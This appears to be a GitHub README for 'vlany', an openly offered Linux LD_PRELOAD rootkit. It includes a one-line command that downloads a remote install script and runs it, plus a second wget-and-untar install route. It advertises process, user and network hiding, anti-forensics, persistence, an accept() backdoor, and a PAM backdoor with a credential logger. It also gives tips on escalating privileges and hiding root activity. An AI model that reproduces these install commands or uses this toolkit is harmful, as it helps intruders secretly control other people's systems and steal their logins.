/vlany

Linux LD_PRELOAD rootkit (x86 and x86_64 architectures)

Primary LanguageCGNU General Public License v3.0GPL-3.0

#vlany (wiki) ####vlany is a Linux LD_PRELOAD rootkit.

##Installing

  • vlany's quick_install.sh script is the fastest/easiest method of installation.
    root@vlany:~# wget https://gist.githubusercontent.com/mempodippy/d93fd99164bace9e63752afb791a896b/raw/6b06d235beac8590f56c47b7f46e2e4fac9cf584/quick_install.sh -O /tmp/quick_install.sh && chmod +x /tmp/quick_install.sh && /tmp/quick_install.sh

    The quick_install.sh script automatically downloads the latest version of vlany from this repository, untars the archive, then executes the regular installation script from a new random directory in /tmp/. By default, the quick_install.sh script removes the new directory once execution has completely finished.

  • It's very simple to install vlany onto a sytem as it comes with an automated install script.
    To install vlany you want to first download it from our GitHub ( Always up to date and trusted )
    root@vlany:~# wget https://github.com/mempodippy/vlany/archive/master.tar.gz && tar xvpfz master.tar.gz

  • Once it's downloaded you just have to run install.sh inside vlany-master.
    root@vlany:~# cd vlany-master && ./install.sh
    By default this will prompt you with a tui installation but if cli is prefered you can use the --cli argument to invoke a similar cli installation.

###ASCIICAST OF INSTALLATION
Regular tui installation on a Debian 8 box using an suid binary to escalate privileges from a tmp user. In a real life scenario, you'll want to play with some environment variables to prevent anyone from seeing your activity when root.

##Downloads quick_install.sh
vlany.tar.gz

##Features

  • Process hiding
  • User hiding
  • Network hiding
  • LXC container
  • Anti-Debug
  • Anti-Forensics
  • Persistent (re)installation & Anti-Detection
  • Dynamic linker modifications
  • Backdoors
    • accept() backdoor (derived from Jynx2)
    • PAM backdoor
      • PAM auth logger
  • vlany-exclusive commands

##Known bugs ###Serious bugs

  1. There is currently only one significant bug in vlany, which unfortunately causes the box to be unable to reboot successfully. This bug arises from hide_checks.c @ hidden_xattr. It'll get fixed.
  2. vlany fails to install correctly on CentOS

###Minor bugs

  1. There is a weird bug where it shows a duplicate line in the w / who commands. This is potentially a way to detect a vlany installation on a box.
  2. Debian (8): When using apt-get, a small notification pops up indicating that a dynamic linker shared library has been modified. The following is what shows: "/sbin/ldconfig.real: /libx32/ld-linux-x32.so.2 is not a symbolic link"

##In-depth README.txt (very detailed but not maintained)
NOTE: vlany is in active development. Changes are constantly being made to this repository, so beware that vlany is very experimental.